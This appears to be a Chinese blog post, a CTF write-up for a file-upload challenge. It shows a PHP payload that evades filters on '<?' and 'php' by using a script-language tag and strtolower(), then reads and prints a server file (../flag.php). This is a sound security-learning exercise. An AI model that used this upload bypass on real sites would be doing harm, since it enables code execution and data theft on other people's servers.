爱春秋-Upload

一句话木马,第一次接触。
可以上传一个文件,同时还能打开这个文件,因此上传一个php木马。

<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP"))); #点号.是连接符
fclose($fh);
</script>

原本的php是<?php,但是题中后台过滤了?,因此使用script,同时过滤的php使用大写和strtolower来搞定连接。
strtolower() :把字符串转换为小写
然后上传成功后打开源代码,发现flag。

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 文件上传漏洞 常见的漏洞分类服务器配置不当导致文件上传开源编辑器存在上传漏洞本地文件上传限制可以上传被绕过服务器端...
    二潘阅读 17,280评论 2 3
  • 原文地址:https://xz.aliyun.com/t/6357 1. 文件上传漏洞 1.1 漏洞简介 ​ 文件...
    这是什么娃哈哈阅读 1,776评论 0 0
  • title: upload-labsdate: 2019-04-17 09:20:52tags:- 文件上传cat...
    Miracle778阅读 11,615评论 0 8
  • 签到2 地址:来源:网络攻防大赛 说了输入zhimakaimen,开始输入没认真看,只能输入10个数字,可是zhi...
    JasonChiu17阅读 4,775评论 0 9
  • 【收获】上午把昨天剩下的后半段“白说 这世界会好吗?”看完了,仍旧是满满的感悟,记录一二。 你会有精神层面的饥饿感...
    一只活蹦乱跳的兔子阅读 333评论 0 1